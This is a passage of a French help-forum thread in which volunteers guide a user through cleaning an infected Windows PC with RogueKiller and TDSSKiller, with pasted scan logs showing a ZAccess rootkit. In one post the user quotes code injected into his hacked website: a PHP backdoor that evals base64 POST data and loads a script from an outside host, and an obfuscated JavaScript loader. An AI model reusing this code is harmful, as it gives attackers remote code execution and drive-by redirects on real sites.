Infecté par Privacy Protection & W32/Katsucha - Page 2

Résolu
Précédent
  • 1
  • 2
  • 3
  1. vincent3569 Messages postés 125 Statut Membre 4
     
    bonjour

    en fait, je n'ai toujours pas accès à Internet (connexion limitée).
    si le fichier en question est un virus, je ne dois probablement pas le copier sur une clé usb ou un autre PC
    0
  2. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    verifie la présence d'un proxy

    Sous Internet Explorer :

    Lancez Internet explorer
    Allez dans le menu Outils d'Internet Explorer
    Cliquez sur Options Internet, puis sur l'onglet Connexions, puis sur Paramètres réseau.
    Cochez : ne pas activer de Serveur proxy...

    Sous Firefox :

    Lancez Firefox
    Allez dans Outils
    Puis Options
    Activez l'onglet Réseau
    Cliquez sur Paramètres
    Et choisissez l'option: Pas de proxy
    Cliquez sur Ok
    0
  3. vincent3569 Messages postés 125 Statut Membre 4
     
    je n'utilise pas de proxy
    en fait c'est plutôt un problème au niveau de l'accès wifi que j'ai une connexion limitée.
    si j'utilise les outils de réparation de la connexion, j'ai le message suivant : "Connexion réseau sans fil" n'a pas de configuration IP valide.

    toutes mes autres connexions fonctionnent, sauf celle de mon PC infecté.
    je me demande si McAfee VirusScan n'est pas corrompu et si le FireWall n'a pas bloqué qq chose.
    0
  4. G-H
     
    salut j'ai une idée :

    demarrer/programmes/accessoires puis clic droit "executer en tant qu'administrateur" sur invité de commande

    dans la fenetre noire tape :

    ipconfig

    puis entrée

    ensuite regarde si tes IP correspondent à 192.168.x.x ou 169.254.x.x
    0
    1. vincent3569 Messages postés 125 Statut Membre 4
       
      j'ai fait un ipconfig comme sugéré, et j'ai bien une adresse en 192.168.xxx.xxx
      0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. vincent3569 Messages postés 125 Statut Membre 4
     
    pour info, j'ai vraiment une infection sévère :
    sans que je sache comment, mon site web a également été piraté :
    des fichiers php ont été modifiés en masse, de même que des fichiers html.

    dans les fichier php, j'ai trouvé ce code :
    <?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://ww1.turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    ajouté en en-tête du fichier

    et sur les fichiers html, j'ai trouvé ce code ;
    <!-- o --><script>try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5t57t20t20.5t29.5t4.5t4.5t62.5t16t50.5t54t57.5t50.5t16t61.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t59.5t57t52.5t58t50.5t20t17t30t52.5t51t57t48.5t54.5t50.5t16t57.5t57t49.5t30.5t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t16t59.5t52.5t50t58t52t30.5t19.5t24.5t24t19.5t16t52t50.5t52.5t51.5t52t58t30.5t19.5t24.5t24t19.5t16t57.5t58t60.5t54t50.5t30.5t19.5t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t29t52t52.5t50t50t50.5t55t29.5t56t55.5t57.5t52.5t58t52.5t55.5t55t29t48.5t49t57.5t55.5t54t58.5t58t50.5t29.5t54t50.5t51t58t29t24t29.5t58t55.5t56t29t24t29.5t19.5t31t30t23.5t52.5t51t57t48.5t54.5t50.5t31t17t20.5t29.5t4.5t4.5t62.5t4.5t4.5t51t58.5t55t49.5t58t52.5t55.5t55t16t52.5t51t57t48.5t54.5t50.5t57t20t20.5t61.5t4.5t4.5t4.5t59t48.5t57t16t51t16t30.5t16t50t55.5t49.5t58.5t54.5t50.5t55t58t23t49.5t57t50.5t48.5t58t50.5t34.5t54t50.5t54.5t50.5t55t58t20t19.5t52.5t51t57t48.5t54.5t50.5t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t57.5t57t49.5t19.5t22t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t20.5t29.5t51t23t57.5t58t60.5t54t50.5t23t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t30.5t19.5t52t52.5t50t50t50.5t55t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t56t55.5t57.5t52.5t58t52.5t55.5t55t30.5t19.5t48.5t49t57.5t55.5t54t58.5t58t50.5t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t54t50.5t51t58t30.5t19.5t24t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t58t55.5t56t30.5t19.5t24t19.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t59.5t52.5t50t58t52t19.5t22t19.5t24.5t24t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t52t50.5t52.5t51.5t52t58t19.5t22t19.5t24.5t24t19.5t20.5t29.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t23t48.5t56t56t50.5t55t50t33.5t52t52.5t54t50t20t51t20.5t29.5t4.5t4.5t62.5';n=n['split'](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"[i]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script><!-- c -->

    je ne sais pas quel pouvoir de nuissance ont ces lignes.
    je ne sais surtout pas ce que je dois faire pour mettre à jour mon serveur.
    0
  7. vincent3569 Messages postés 125 Statut Membre 4
     
    pouvez-vous m'indiquer quelles opérations je dois réaliser maintenant ?
    j'avoue être un peu perdu
    0
  8. vincent3569 Messages postés 125 Statut Membre 4
     
    OK sur FF

    sur IE : pour cocher "Ne pas utiliser de serveur proxy pour les adresses locales", j'ai dû cocher "Utiliser un serveur proxy pour votre réseau local (ces paramètres ne s'appliquent pas aux connexions d'accès à distance)"

    ces 2options étaient décochées auparavant.

    c'est OK ?
    0
    1. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
       
      as tu également fais roguekiller en option 4 ?
      0
    2. vincent3569 Messages postés 125 Statut Membre 4
       
      c'est fait désormais :

      RogueKiller V6.1.6 [01/11/2011] par Tigzy
      mail: tigzyRK<at>gmail<dot>com
      Remontees: https://www.luanagames.com/index.fr.html
      Blog: http://tigzyrk.blogspot.com

      Systeme d'exploitation: Windows 7 (6.1.7601 Service Pack 1) 32 bits version
      Demarrage : Mode normal
      Utilisateur: Famille [Droits d'admin]
      Mode: Proxy RAZ -- Date : 09/11/2011 23:07:38

      Processus malicieux: 1
      [SUSP PATH] RTKAUDIOSERVICE.EXE -- C:\Windows\RtkAudioService.exe -> KILLED [TermProc]

      Driver: [LOADED]

      Entrees de registre: 1
      [PROXY IE] HKCU\[...]\Internet Settings : ProxyEnable (1) -> REPLACED (0)

      Termine : << RKreport[1].txt >>
      RKreport[1].txt




      cela n'a rien résolu : je suis toujours en connexion limitée

      j'attends tes nouvelles consignes
      0
  9. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    Télécharge Reload_TDSSKiller
    https://support.kaspersky.com/downloads/utils/tdsskiller.exe

    Lance le

    choisis : lancer le nettoyage

    l'outil va automatiquement télécharger la derniere version puis

    TDSSKiller va s'ouvrir , clique sur "Start Scan" Clique ici pour l'aide en image

    Si TDSS.tdl2 est détecté: l'option delete sera cochée par défaut.
    Si TDSS.tdl3 est détecté: assure toi que Cure est bien cochée.
    Si TDSS.tdl4(\HardDisk0\MBR) est détecté: assure toi que Cure est bien cochée.
    Si Rootkit.Win32.ZAccess.* est détecté : règle sur "cure" en haut , et "delete" en bas
    Si Suspicious file est indiqué, laisse l''option cochée sur Skip
    une fois qu'il a terminé , redémarre s'il te le demande pour finir de nettoyer

    sinon , ferme TDSSKiller et le rapport s'affichera sur le bureau

    Copie/Colle son contenu dans ta prochaine réponse.
    0
  10. vincent3569 Messages postés 125 Statut Membre 4
     
    voici le rapport :

    23:37:20.0008 2888 TDSS rootkit removing tool 2.6.16.0 Nov 7 2011 16:26:51
    23:37:20.0019 2888 ============================================================
    23:37:20.0019 2888 Current date / time: 2011/11/09 23:37:20.0019
    23:37:20.0019 2888 SystemInfo:
    23:37:20.0019 2888
    23:37:20.0019 2888 OS Version: 6.1.7601 ServicePack: 1.0
    23:37:20.0019 2888 Product type: Workstation
    23:37:20.0019 2888 ComputerName: VAIO-FAMILLE
    23:37:20.0019 2888 UserName: Famille
    23:37:20.0019 2888 Windows directory: C:\Windows
    23:37:20.0019 2888 System windows directory: C:\Windows
    23:37:20.0019 2888 Processor architecture: Intel x86
    23:37:20.0019 2888 Number of processors: 2
    23:37:20.0019 2888 Page size: 0x1000
    23:37:20.0019 2888 Boot type: Normal boot
    23:37:20.0019 2888 ============================================================
    23:37:20.0512 2888 Initialize success
    23:37:28.0176 5248 ============================================================
    23:37:28.0176 5248 Scan started
    23:37:28.0176 5248 Mode: Manual;
    23:37:28.0176 5248 ============================================================
    23:37:28.0773 5248 1394ohci (1b133875b8aa8ac48969bd3458afe9f5) C:\Windows\system32\drivers\1394ohci.sys
    23:37:28.0775 5248 1394ohci - ok
    23:37:28.0971 5248 ACPI (cea80c80bed809aa0da6febc04733349) C:\Windows\system32\drivers\ACPI.sys
    23:37:28.0975 5248 ACPI - ok
    23:37:29.0155 5248 AcpiPmi (1efbc664abff416d1d07db115dcb264f) C:\Windows\system32\drivers\acpipmi.sys
    23:37:29.0156 5248 AcpiPmi - ok
    23:37:29.0412 5248 adp94xx (21e785ebd7dc90a06391141aac7892fb) C:\Windows\system32\DRIVERS\adp94xx.sys
    23:37:29.0418 5248 adp94xx - ok
    23:37:29.0583 5248 adpahci (0c676bc278d5b59ff5abd57bbe9123f2) C:\Windows\system32\DRIVERS\adpahci.sys
    23:37:29.0587 5248 adpahci - ok
    23:37:29.0753 5248 adpu320 (7c7b5ee4b7b822ec85321fe23a27db33) C:\Windows\system32\DRIVERS\adpu320.sys
    23:37:29.0755 5248 adpu320 - ok
    23:37:29.0943 5248 AFD (677e63d76f996aeed342cc0ef15f14ac) C:\Windows\system32\drivers\afd.sys
    23:37:29.0945 5248 AFD ( Rootkit.Win32.ZAccess.j ) - infected
    23:37:29.0946 5248 AFD - detected Rootkit.Win32.ZAccess.j (0)
    23:37:30.0064 5248 agp440 (507812c3054c21cef746b6ee3d04dd6e) C:\Windows\system32\drivers\agp440.sys
    23:37:30.0065 5248 agp440 - ok
    23:37:30.0226 5248 aic78xx (8b30250d573a8f6b4bd23195160d8707) C:\Windows\system32\DRIVERS\djsvs.sys
    23:37:30.0228 5248 aic78xx - ok
    23:37:30.0388 5248 aliide (0d40bcf52ea90fc7df2aeab6503dea44) C:\Windows\system32\drivers\aliide.sys
    23:37:30.0389 5248 aliide - ok
    23:37:30.0510 5248 amdagp (3c6600a0696e90a463771c7422e23ab5) C:\Windows\system32\drivers\amdagp.sys
    23:37:30.0511 5248 amdagp - ok
    23:37:30.0653 5248 amdide (cd5914170297126b6266860198d1d4f0) C:\Windows\system32\drivers\amdide.sys
    23:37:30.0654 5248 amdide - ok
    23:37:30.0810 5248 AmdK8 (00dda200d71bac534bf56a9db5dfd666) C:\Windows\system32\DRIVERS\amdk8.sys
    23:37:30.0812 5248 AmdK8 - ok
    23:37:30.0975 5248 AmdPPM (3cbf30f5370fda40dd3e87df38ea53b6) C:\Windows\system32\DRIVERS\amdppm.sys
    23:37:30.0976 5248 AmdPPM - ok
    23:37:31.0135 5248 amdsata (d320bf87125326f996d4904fe24300fc) C:\Windows\system32\drivers\amdsata.sys
    23:37:31.0136 5248 amdsata - ok
    23:37:31.0279 5248 amdsbs (ea43af0c423ff267355f74e7a53bdaba) C:\Windows\system32\DRIVERS\amdsbs.sys
    23:37:31.0281 5248 amdsbs - ok
    23:37:31.0356 5248 amdxata (46387fb17b086d16dea267d5be23a2f2) C:\Windows\system32\drivers\amdxata.sys
    23:37:31.0357 5248 amdxata - ok
    23:37:31.0541 5248 AppID (aea177f783e20150ace5383ee368da19) C:\Windows\system32\drivers\appid.sys
    23:37:31.0543 5248 AppID - ok
    23:37:31.0709 5248 arc (2932004f49677bd84dbc72edb754ffb3) C:\Windows\system32\DRIVERS\arc.sys
    23:37:31.0710 5248 arc - ok
    23:37:31.0838 5248 arcsas (5d6f36c46fd283ae1b57bd2e9feb0bc7) C:\Windows\system32\DRIVERS\arcsas.sys
    23:37:31.0840 5248 arcsas - ok
    23:37:31.0969 5248 ArcSoftKsUFilter (857b48965a0503b7ab795d4bfe7cbd8b) C:\Windows\system32\DRIVERS\ArcSoftKsUFilter.sys
    23:37:31.0970 5248 ArcSoftKsUFilter - ok
    23:37:32.0123 5248 AsyncMac (add2ade1c2b285ab8378d2daaf991481) C:\Windows\system32\DRIVERS\asyncmac.sys
    23:37:32.0124 5248 AsyncMac - ok
    23:37:32.0285 5248 atapi (338c86357871c167a96ab976519bf59e) C:\Windows\system32\drivers\atapi.sys
    23:37:32.0286 5248 atapi - ok
    23:37:32.0495 5248 b06bdrv (1a231abec60fd316ec54c66715543cec) C:\Windows\system32\DRIVERS\bxvbdx.sys
    23:37:32.0501 5248 b06bdrv - ok
    23:37:32.0686 5248 b57nd60x (bd8869eb9cde6bbe4508d869929869ee) C:\Windows\system32\DRIVERS\b57nd60x.sys
    23:37:32.0689 5248 b57nd60x - ok
    23:37:32.0854 5248 Beep (505506526a9d467307b3c393dedaf858) C:\Windows\system32\drivers\Beep.sys
    23:37:32.0855 5248 Beep - ok
    23:37:33.0017 5248 blbdrive (2287078ed48fcfc477b05b20cf38f36f) C:\Windows\system32\DRIVERS\blbdrive.sys
    23:37:33.0018 5248 blbdrive - ok
    23:37:33.0175 5248 bowser (8f2da3028d5fcbd1a060a3de64cd6506) C:\Windows\system32\DRIVERS\bowser.sys
    23:37:33.0177 5248 bowser - ok
    23:37:33.0295 5248 BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\DRIVERS\BrFiltLo.sys
    23:37:33.0296 5248 BrFiltLo - ok
    23:37:33.0454 5248 BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\DRIVERS\BrFiltUp.sys
    23:37:33.0455 5248 BrFiltUp - ok
    23:37:33.0613 5248 Brserid (845b8ce732e67f3b4133164868c666ea) C:\Windows\System32\Drivers\Brserid.sys
    23:37:33.0617 5248 Brserid - ok
    23:37:33.0734 5248 BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\System32\Drivers\BrSerWdm.sys
    23:37:33.0735 5248 BrSerWdm - ok
    23:37:33.0851 5248 BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\System32\Drivers\BrUsbMdm.sys
    23:37:33.0852 5248 BrUsbMdm - ok
    23:37:33.0880 5248 BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\System32\Drivers\BrUsbSer.sys
    23:37:33.0881 5248 BrUsbSer - ok
    23:37:34.0061 5248 BthEnum (2865a5c8e98c70c605f417908cebb3a4) C:\Windows\system32\drivers\BthEnum.sys
    23:37:34.0062 5248 BthEnum - ok
    23:37:34.0175 5248 BTHMODEM (ed3df7c56ce0084eb2034432fc56565a) C:\Windows\system32\DRIVERS\bthmodem.sys
    23:37:34.0176 5248 BTHMODEM - ok
    23:37:34.0335 5248 BthPan (ad1872e5829e8a2c3b5b4b641c3eab0e) C:\Windows\system32\DRIVERS\bthpan.sys
    23:37:34.0337 5248 BthPan - ok
    23:37:34.0502 5248 BTHPORT (c2fbf6d271d9a94d839c416bf186ead9) C:\Windows\System32\Drivers\BTHport.sys
    23:37:34.0507 5248 BTHPORT - ok
    23:37:34.0668 5248 BTHUSB (c81e9413a25a439f436b1d4b6a0cf9e9) C:\Windows\System32\Drivers\BTHUSB.sys
    23:37:34.0670 5248 BTHUSB - ok
    23:37:34.0823 5248 btwaudio (d57d29132efe13a83133d9bd449e0cf1) C:\Windows\system32\drivers\btwaudio.sys
    23:37:34.0824 5248 btwaudio - ok
    23:37:34.0937 5248 btwavdt (d282c14a69357d0e1bafaecc2ca98c3a) C:\Windows\system32\drivers\btwavdt.sys
    23:37:34.0938 5248 btwavdt - ok
    23:37:35.0051 5248 btwl2cap (aafd7cb76ba61fbb08e302da208c974a) C:\Windows\system32\DRIVERS\btwl2cap.sys
    23:37:35.0052 5248 btwl2cap - ok
    23:37:35.0192 5248 btwrchid (02eb4d2b05967df2d32f29c84ab1fb17) C:\Windows\system32\DRIVERS\btwrchid.sys
    23:37:35.0193 5248 btwrchid - ok
    23:37:35.0305 5248 catchme - ok
    23:37:35.0457 5248 cdfs (77ea11b065e0a8ab902d78145ca51e10) C:\Windows\system32\DRIVERS\cdfs.sys
    23:37:35.0458 5248 cdfs - ok
    23:37:35.0616 5248 cdrom (be167ed0fdb9c1fa1133953c18d5a6c9) C:\Windows\system32\drivers\cdrom.sys
    23:37:35.0617 5248 cdrom - ok
    23:37:35.0791 5248 circlass (3fe3fe94a34df6fb06e6418d0f6a0060) C:\Windows\system32\DRIVERS\circlass.sys
    23:37:35.0792 5248 circlass - ok
    23:37:35.0912 5248 CLFS (635181e0e9bbf16871bf5380d71db02d) C:\Windows\system32\CLFS.sys
    23:37:35.0915 5248 CLFS - ok
    23:37:36.0080 5248 CmBatt (dea805815e587dad1dd2c502220b5616) C:\Windows\system32\DRIVERS\CmBatt.sys
    23:37:36.0081 5248 CmBatt - ok
    23:37:36.0198 5248 cmdide (c537b1db64d495b9b4717b4d6d9edbf2) C:\Windows\system32\drivers\cmdide.sys
    23:37:36.0199 5248 cmdide - ok
    23:37:36.0251 5248 CNG (1b675691ed940766149c93e8f4488d68) C:\Windows\system32\Drivers\cng.sys
    23:37:36.0256 5248 CNG - ok
    23:37:36.0411 5248 Compbatt (a6023d3823c37043986713f118a89bee) C:\Windows\system32\DRIVERS\compbatt.sys
    23:37:36.0412 5248 Compbatt - ok
    23:37:36.0567 5248 CompositeBus (cbe8c58a8579cfe5fccf809e6f114e89) C:\Windows\system32\drivers\CompositeBus.sys
    23:37:36.0568 5248 CompositeBus - ok
    23:37:36.0727 5248 crcdisk (2c4ebcfc84a9b44f209dff6c6e6c61d1) C:\Windows\system32\DRIVERS\crcdisk.sys
    23:37:36.0728 5248 crcdisk - ok
    23:37:36.0901 5248 DfsC (f024449c97ec1e464aaffda18593db88) C:\Windows\system32\Drivers\dfsc.sys
    23:37:36.0903 5248 DfsC - ok
    23:37:37.0029 5248 discache (1a050b0274bfb3890703d490f330c0da) C:\Windows\system32\drivers\discache.sys
    23:37:37.0030 5248 discache - ok
    23:37:37.0180 5248 Disk (565003f326f99802e68ca78f2a68e9ff) C:\Windows\system32\DRIVERS\disk.sys
    23:37:37.0180 5248 Disk - ok
    23:37:37.0318 5248 DMICall (f206e28ed74c491fd5d7c0a1119ce37f) C:\Windows\system32\DRIVERS\DMICall.sys
    23:37:37.0318 5248 DMICall - ok
    23:37:37.0494 5248 Dot4 (b5e479eb83707dd698f66953e922042c) C:\Windows\system32\DRIVERS\Dot4.sys
    23:37:37.0496 5248 Dot4 - ok
    23:37:37.0649 5248 Dot4Print (caefd09b6a6249c53a67d55a9a9fcabf) C:\Windows\system32\DRIVERS\Dot4Prt.sys
    23:37:37.0650 5248 Dot4Print - ok
    23:37:37.0808 5248 dot4usb (cf491ff38d62143203c065260567e2f7) C:\Windows\system32\DRIVERS\dot4usb.sys
    23:37:37.0809 5248 dot4usb - ok
    23:37:37.0976 5248 drmkaud (b918e7c5f9bf77202f89e1a9539f2eb4) C:\Windows\system32\drivers\drmkaud.sys
    23:37:37.0977 5248 drmkaud - ok
    23:37:38.0109 5248 DXGKrnl (23f5d28378a160352ba8f817bd8c71cb) C:\Windows\System32\drivers\dxgkrnl.sys
    23:37:38.0113 5248 DXGKrnl - ok
    23:37:38.0356 5248 ebdrv (024e1b5cac09731e4d868e64dbfb4ab0) C:\Windows\system32\DRIVERS\evbdx.sys
    23:37:38.0395 5248 ebdrv - ok
    23:37:38.0569 5248 elxstor (0ed67910c8c326796faa00b2bf6d9d3c) C:\Windows\system32\DRIVERS\elxstor.sys
    23:37:38.0575 5248 elxstor - ok
    23:37:38.0692 5248 ErrDev (8fc3208352dd3912c94367a206ab3f11) C:\Windows\system32\drivers\errdev.sys
    23:37:38.0692 5248 ErrDev - ok
    23:37:38.0859 5248 exfat (2dc9108d74081149cc8b651d3a26207f) C:\Windows\system32\drivers\exfat.sys
    23:37:38.0861 5248 exfat - ok
    23:37:38.0996 5248 fastfat (7e0ab74553476622fb6ae36f73d97d35) C:\Windows\system32\drivers\fastfat.sys
    23:37:38.0998 5248 fastfat - ok
    23:37:39.0188 5248 fdc (e817a017f82df2a1f8cfdbda29388b29) C:\Windows\system32\DRIVERS\fdc.sys
    23:37:39.0189 5248 fdc - ok
    23:37:39.0330 5248 FileInfo (6cf00369c97f3cf563be99be983d13d8) C:\Windows\system32\drivers\fileinfo.sys
    23:37:39.0330 5248 FileInfo - ok
    23:37:39.0433 5248 Filetrace (42c51dc94c91da21cb9196eb64c45db9) C:\Windows\system32\drivers\filetrace.sys
    23:37:39.0434 5248 Filetrace - ok
    23:37:39.0543 5248 flpydisk (87907aa70cb3c56600f1c2fb8841579b) C:\Windows\system32\DRIVERS\flpydisk.sys
    23:37:39.0544 5248 flpydisk - ok
    23:37:39.0694 5248 FltMgr (7520ec808e0c35e0ee6f841294316653) C:\Windows\system32\drivers\fltmgr.sys
    23:37:39.0696 5248 FltMgr - ok
    23:37:39.0820 5248 FsDepends (1a16b57943853e598cff37fe2b8cbf1d) C:\Windows\system32\drivers\FsDepends.sys
    23:37:39.0821 5248 FsDepends - ok
    23:37:39.0845 5248 Fs_Rec (a574b4360e438977038aae4bf60d79a2) C:\Windows\system32\drivers\Fs_Rec.sys
    23:37:39.0845 5248 Fs_Rec - ok
    23:37:40.0037 5248 fvevol (8a73e79089b282100b9393b644cb853b) C:\Windows\system32\DRIVERS\fvevol.sys
    23:37:40.0039 5248 fvevol - ok
    23:37:40.0182 5248 gagp30kx (65ee0c7a58b65e74ae05637418153938) C:\Windows\system32\DRIVERS\gagp30kx.sys
    23:37:40.0183 5248 gagp30kx - ok
    23:37:40.0348 5248 hcw85cir (c44e3c2bab6837db337ddee7544736db) C:\Windows\system32\drivers\hcw85cir.sys
    23:37:40.0349 5248 hcw85cir - ok
    23:37:40.0492 5248 HDAudBus (9036377b8a6c15dc2eec53e489d159b5) C:\Windows\system32\drivers\HDAudBus.sys
    23:37:40.0493 5248 HDAudBus - ok
    23:37:40.0603 5248 HidBatt (1d58a7f3e11a9731d0eaaaa8405acc36) C:\Windows\system32\DRIVERS\HidBatt.sys
    23:37:40.0604 5248 HidBatt - ok
    23:37:40.0713 5248 HidBth (89448f40e6df260c206a193a4683ba78) C:\Windows\system32\DRIVERS\hidbth.sys
    23:37:40.0714 5248 HidBth - ok
    23:37:40.0863 5248 HidIr (cf50b4cf4a4f229b9f3c08351f99ca5e) C:\Windows\system32\DRIVERS\hidir.sys
    23:37:40.0864 5248 HidIr - ok
    23:37:41.0054 5248 HidUsb (10c19f8290891af023eaec0832e1eb4d) C:\Windows\system32\DRIVERS\hidusb.sys
    23:37:41.0054 5248 HidUsb - ok
    23:37:41.0223 5248 HpSAMD (295fdc419039090eb8b49ffdbb374549) C:\Windows\system32\drivers\HpSAMD.sys
    23:37:41.0224 5248 HpSAMD - ok
    23:37:41.0415 5248 HSF_DPV (7bc42c65b5c6281777c1a7605b253ba8) C:\Windows\system32\DRIVERS\HSX_DPV.sys
    23:37:41.0428 5248 HSF_DPV - ok
    23:37:41.0555 5248 HSXHWAZL (9ebf2d102ccbb6bcdfbf1b7922f8ba2e) C:\Windows\system32\DRIVERS\HSXHWAZL.sys
    23:37:41.0558 5248 HSXHWAZL - ok
    23:37:41.0754 5248 HTTP (871917b07a141bff43d76d8844d48106) C:\Windows\system32\drivers\HTTP.sys
    23:37:41.0762 5248 HTTP - ok
    23:37:41.0878 5248 hwpolicy (0c4e035c7f105f1299258c90886c64c5) C:\Windows\system32\drivers\hwpolicy.sys
    23:37:41.0879 5248 hwpolicy - ok
    23:37:42.0042 5248 i8042prt (f151f0bdc47f4a28b1b20a0818ea36d6) C:\Windows\system32\drivers\i8042prt.sys
    23:37:42.0044 5248 i8042prt - ok
    23:37:42.0228 5248 iaStor (db0cc620b27a928d968c1a1e9cd9cb87) C:\Windows\system32\DRIVERS\iaStor.sys
    23:37:42.0230 5248 iaStor - ok
    23:37:42.0386 5248 iaStorV (5cd5f9a5444e6cdcb0ac89bd62d8b76e) C:\Windows\system32\drivers\iaStorV.sys
    23:37:42.0390 5248 iaStorV - ok
    23:37:42.0562 5248 iirsp (4173ff5708f3236cf25195fecd742915) C:\Windows\system32\DRIVERS\iirsp.sys
    23:37:42.0563 5248 iirsp - ok
    23:37:42.0787 5248 IntcAzAudAddService (36898985bcd884d8dfb99a39007f29a7) C:\Windows\system32\drivers\RTKVHDA.sys
    23:37:42.0799 5248 IntcAzAudAddService - ok
    23:37:42.0907 5248 intelide (a0f12f2c9ba6c72f3987ce780e77c130) C:\Windows\system32\drivers\intelide.sys
    23:37:42.0908 5248 intelide - ok
    23:37:43.0015 5248 intelppm (3b514d27bfc4accb4037bc6685f766e0) C:\Windows\system32\DRIVERS\intelppm.sys
    23:37:43.0015 5248 intelppm - ok
    23:37:43.0169 5248 IpFilterDriver (709d1761d3b19a932ff0238ea6d50200) C:\Windows\system32\DRIVERS\ipfltdrv.sys
    23:37:43.0170 5248 IpFilterDriver - ok
    23:37:43.0314 5248 IPMIDRV (4bd7134618c1d2a27466a099062547bf) C:\Windows\system32\drivers\IPMIDrv.sys
    23:37:43.0315 5248 IPMIDRV - ok
    23:37:43.0424 5248 IPNAT (a5fa468d67abcdaa36264e463a7bb0cd) C:\Windows\system32\drivers\ipnat.sys
    23:37:43.0427 5248 IPNAT - ok
    23:37:43.0582 5248 IRENUM (42996cff20a3084a56017b7902307e9f) C:\Windows\system32\drivers\irenum.sys
    23:37:43.0583 5248 IRENUM - ok
    23:37:43.0720 5248 isapnp (1f32bb6b38f62f7df1a7ab7292638a35) C:\Windows\system32\drivers\isapnp.sys
    23:37:43.0721 5248 isapnp - ok
    23:37:43.0823 5248 iScsiPrt (cb7a9abb12b8415bce5d74994c7ba3ae) C:\Windows\system32\drivers\msiscsi.sys
    23:37:43.0826 5248 iScsiPrt - ok
    23:37:43.0944 5248 JMCR_CFS (0d8ba4a407a3369039cc375b8f23627e) C:\Windows\system32\DRIVERS\jmcr_cfs.sys
    23:37:43.0945 5248 JMCR_CFS - ok
    23:37:44.0091 5248 kbdclass (adef52ca1aeae82b50df86b56413107e) C:\Windows\system32\drivers\kbdclass.sys
    23:37:44.0091 5248 kbdclass - ok
    23:37:44.0219 5248 kbdhid (9e3ced91863e6ee98c24794d05e27a71) C:\Windows\system32\drivers\kbdhid.sys
    23:37:44.0220 5248 kbdhid - ok
    23:37:44.0352 5248 KSecDD (412cea1aa78cc02a447f5c9e62b32ff1) C:\Windows\system32\Drivers\ksecdd.sys
    23:37:44.0353 5248 KSecDD - ok
    23:37:44.0493 5248 KSecPkg (26c046977e85b95036453d7b88ba1820) C:\Windows\system32\Drivers\ksecpkg.sys
    23:37:44.0494 5248 KSecPkg - ok
    23:37:44.0655 5248 lltdio (f7611ec07349979da9b0ae1f18ccc7a6) C:\Windows\system32\DRIVERS\lltdio.sys
    23:37:44.0656 5248 lltdio - ok
    23:37:44.0803 5248 LSI_FC (eb119a53ccf2acc000ac71b065b78fef) C:\Windows\system32\DRIVERS\lsi_fc.sys
    23:37:44.0805 5248 LSI_FC - ok
    23:37:44.0954 5248 LSI_SAS (8ade1c877256a22e49b75d1cc9161f9c) C:\Windows\system32\DRIVERS\lsi_sas.sys
    23:37:44.0955 5248 LSI_SAS - ok
